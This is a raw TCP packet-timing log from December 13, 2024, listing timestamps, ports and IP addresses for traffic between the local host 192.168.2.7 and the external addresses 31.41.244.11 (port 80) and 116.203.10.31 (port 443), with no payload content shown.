Dec 13, 2024 18:53:44.918581009 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.919523954 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.919595003 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.919738054 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.919781923 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.920551062 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.920597076 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.920654058 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.920696974 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.921664000 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.921709061 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.921788931 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.921833992 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.922736883 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.922791004 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.922890902 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.922934055 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.923619032 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.923662901 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.923775911 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.923816919 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.924675941 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.924719095 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.924880028 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.924926996 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.925623894 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.925681114 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.925764084 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.925806999 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.926744938 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.926790953 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.926970959 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.927011013 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.927788019 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.927833080 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.927889109 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.927932978 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.928682089 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.928724051 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.928890944 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.928935051 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.929760933 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.929807901 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.929883003 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.929923058 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.930756092 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.930802107 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.930903912 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.930949926 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.931802988 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.931854963 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.931998014 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.932043076 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.932883978 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.932925940 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.932962894 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.933006048 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.933877945 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.933923960 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.933983088 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.934024096 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.934983015 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.935028076 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.935265064 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.935302973 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.935939074 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.935991049 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.936023951 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.936069965 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.936913013 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.936973095 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.937036037 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.937102079 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.937930107 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.937969923 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.938002110 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.938041925 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.938982010 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.939023972 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.939114094 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.939150095 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.939995050 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.940035105 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.940073013 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.940110922 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.941042900 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.941081047 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.941188097 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.941226959 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.942101955 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.942152023 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.942213058 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.942261934 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.943068981 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.943119049 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.943160057 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.943206072 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.944048882 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.944093943 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.944143057 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.944186926 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.945066929 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.945113897 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.945184946 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.945228100 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.946160078 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.946209908 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.946332932 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.946382999 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.947134018 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.947181940 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.947247982 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.947293043 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.948174953 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.948223114 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.948293924 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.948340893 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.949207067 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.949251890 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.949385881 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.949433088 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.950187922 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.950233936 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.950297117 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.950341940 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.951303005 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.951353073 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.951401949 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.951452017 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.952248096 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.952296019 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.952341080 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.952383041 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.953282118 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.953336954 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.953428030 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.953471899 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.954404116 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.954454899 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.954531908 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.954576969 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.955389023 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.955432892 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.955478907 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.955526114 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.956337929 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.956387043 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.956428051 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.956471920 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.957425117 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.957470894 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.957597017 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.957640886 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.958462954 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.958508968 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.958554983 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.958596945 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.959472895 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.959525108 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.959536076 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.959589005 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.960573912 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.960619926 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.960700035 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.960751057 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.961487055 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.961536884 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.961584091 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.961637020 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.962477922 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.962524891 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.962609053 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.962666035 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.963507891 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.963563919 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.963607073 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.963654995 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.964538097 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.964590073 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.964723110 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.964772940 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.965629101 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.965675116 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.965747118 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.965797901 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.966586113 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.966639042 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.966681957 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.966733932 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.967586994 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.967633963 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.967675924 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.967736959 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.968656063 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.968707085 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.968748093 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.968791962 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.059767008 CET	443	49896	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:45.059834003 CET	49896	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:45.059860945 CET	443	49896	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:45.059902906 CET	49896	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:45.060710907 CET	49896	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:45.060738087 CET	443	49896	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:45.071214914 CET	49904	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:45.071264029 CET	443	49904	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:45.071387053 CET	49904	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:45.071547985 CET	49904	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:45.071573019 CET	443	49904	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:45.119601965 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.119750023 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.119775057 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.119833946 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.119982004 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.120028973 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.120168924 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.120218039 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.120976925 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.121028900 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.121073008 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.121123075 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.122009039 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.122056961 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.122303963 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.122354031 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.122447968 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.122503042 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.123375893 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.123430014 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.123543978 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.123589039 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.124382973 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.124433994 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.124536991 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.124579906 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.125514984 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.125564098 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.125683069 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.125729084 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.125817060 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.125873089 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.126749039 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.126801968 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.126833916 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.126884937 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.127763987 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.127820015 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.127932072 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.127980947 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.128803015 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.128859997 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.128860950 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.128911018 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.129798889 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.129842997 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.129898071 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.129947901 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.130896091 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.130965948 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.130986929 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.131036997 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.131896973 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.131968021 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.131968021 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.132028103 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.132991076 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.133048058 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.133055925 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.133106947 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.133871078 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.133922100 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.134130955 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.134191990 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.134918928 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.135011911 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.135062933 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.135126114 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.135961056 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.136017084 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.136069059 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.136161089 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.136986017 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.137038946 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.137082100 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.137132883 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.137986898 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.138060093 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.138078928 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.138130903 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.139048100 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.139097929 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.139136076 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.139178991 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.140006065 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.140064955 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.140132904 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.140182018 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.141150951 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.141201019 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.141249895 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.141299963 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.142322063 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.142374992 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.142484903 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.142535925 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.143409967 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.143436909 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.143474102 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.143475056 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.144372940 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.144423962 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.144467115 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.144520044 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.145406008 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.145483971 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.145487070 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.145531893 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.146437883 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.146502972 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.146646023 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.146692991 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.147479057 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.147536993 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.147579908 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.147625923 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.148757935 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.148813963 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.149148941 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.149198055 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.150226116 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.150280952 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.150299072 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.150357008 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.151051044 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.151103020 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.151145935 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.151196003 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.151947975 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.152002096 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.152093887 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.152143955 CET	49895	80	192.168.2.7	31.41.244.11
